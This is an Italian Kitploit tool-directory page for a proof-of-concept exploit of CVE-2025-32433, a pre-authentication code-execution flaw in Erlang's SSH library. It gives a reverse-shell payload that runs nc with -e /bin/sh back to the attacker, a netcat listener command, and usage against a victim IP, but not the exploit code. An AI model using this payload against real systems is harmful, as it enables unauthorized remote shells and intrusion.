Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3243 — Un exploit proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice pre-autenticato tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati. | Kitploit
Strumenti/GitHubGitHub/tenebrae93/cve-2025-3243
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso Remoto
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Un exploit proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice pre-autenticato tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.

Vedi Repository
7111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32433 Exploit per la Libreria SSH di Erlang

Un proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice prima dell'autenticazione tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.


Caratteristiche

  • Exploit originale di Matthew Keeley
  • Versione aggiornata di Tyler Ramsbey:
    • Argomenti da riga di comando per LHOST, LPORT, RHOST e RPORT
    • Help e utilizzo integrati tramite argparse
    • Payload per reverse shell in stile Erlang usando os:cmd("nc LHOST LPORT -e /bin/sh").
    • Scomposizione pulita delle funzioni e logging dello stato per ogni fase

Prerequisiti

  • Python 3
  • Un listener nc (Netcat) funzionante sulla macchina attaccante
  • Accesso di rete al servizio SSH di destinazione (porta predefinita 22)

  • Utilizzo

    1. Avvia il listener sulla macchina attaccante:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Esegui l'exploit:

      root@kitploit:~
      python3 CVE-2025-32433.py -lh [IP-Attaccante] -lp [Porta-Attaccante] -rh [IP-Vittima] -rp [Porta-Vittima]
      
    3. Attendi la shell che si connetta al tuo listener.

    Menu di Aiuto

    root@kitploit:~
    $ python3 CVE-2025-32433.py -h
    usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
    
    Invia una richiesta di canale SSH pre-autenticazione con un payload RCE di Erlang
    per ottenere una reverse shell
    
    optional arguments:
      -h, --help            mostra questo messaggio di aiuto ed esci
      -lh LHOST, --lhost LHOST
                            Host/IP locale per ricevere la reverse shell
      -lp LPORT, --lport LPORT
                            Porta locale per ricevere la reverse shell
      -rh RHOST, --rhost RHOST
                            IP del server SSH di destinazione (default: 10.10.248.101)
      -rp RPORT, --rport RPORT
                            Porta del server SSH di destinazione (default: 22)
    

    Crediti

    • Script originale di Matthew Keeley (MattKeeley)
    • Questa versione aggiornata di Tyler Ramsbey

    Disclaimer

    Usa questo codice solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e non etico.

    Scarica lo strumento